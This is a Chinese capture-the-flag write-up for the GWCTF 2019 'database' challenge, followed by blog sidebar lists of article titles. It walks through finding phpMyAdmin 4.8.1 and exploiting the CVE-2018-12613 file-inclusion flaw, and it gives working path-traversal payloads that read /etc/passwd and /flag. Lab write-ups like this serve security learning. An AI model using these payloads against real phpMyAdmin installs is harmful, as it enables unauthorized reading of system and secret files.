[GWCTF 2019]我有一个数据库 WP
2024-09-02 01:32:29
打开环境访问看到
提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果
但是有数据库嘛,那么试试常见的几个加上phpmyadmin
试试
于是看到了版本是4.8.1
拿到信息
百度一下 phpmyadmin4.8.1
漏洞
看到最多的是文件包含漏洞 编号 CVE-2018-12613
那么思路肯定就是复现漏洞了,于是开始找 poc
然后直接开打
构造payload
index.php?target=db_datadict.php%253f../../../../../../etc/passwd
发现回显
最后的payload
index.php?target=db_datadict.php%253f../../../../../../flag
得到flag
最新文章
- 获取url传参
- 图片缩放应用(nearest / bilinear / three-order interpolate)
- Android抽象布局——include、merge 、ViewStub
- ADB调试桥安装(方式二)
- Java设计模式系列之动态代理模式(转载)
- [转]在 Windows Server 2012 上安装 IIS 8
- SQL SERVER 主键约束
- 理解OAuth 2.0--转
- JQUERY1.9学习笔记 之属性选择器(一) 前缀选择器
- python_嵌套列表变成普通列表
- 【山东省选2008】郁闷的小J 平衡树Treap
- forfiles命令批处理删除过期文件
- 利用ffmpeg做视频解码的顺序
- Android 高级控件(七)——RecyclerView的方方面面
- [Linux]安装node.js
- eclipse安装插件配置Android开发环境
- php 网站中文简体繁体转换类
- bootstrap模态框input不能获取焦点并编辑【转】
- 题目1162:I Wanna Go Home(最短路径问题进阶dijkstra算法))
- SSM三层模型之间的参数传递
热门文章
- NC16618 [NOIP2008]排座椅
- 抓到 Netty 一个 Bug,顺带来透彻地聊一下 Netty 是如何高效接收网络连接的
- shell判断参数值是否在数组内的方法
- Three.js系列: 在元宇宙看电影,享受 VR 视觉盛宴
- AlterNats是如何做到高性能的发布订阅的?
- IDEA快捷键-03
- 【C++】从设计原理来看string类
- Linux系统安全与应用
- ACWing93.递归实现组合型枚举
- AtCoder Beginner Contest 261E // 按位思考 + dp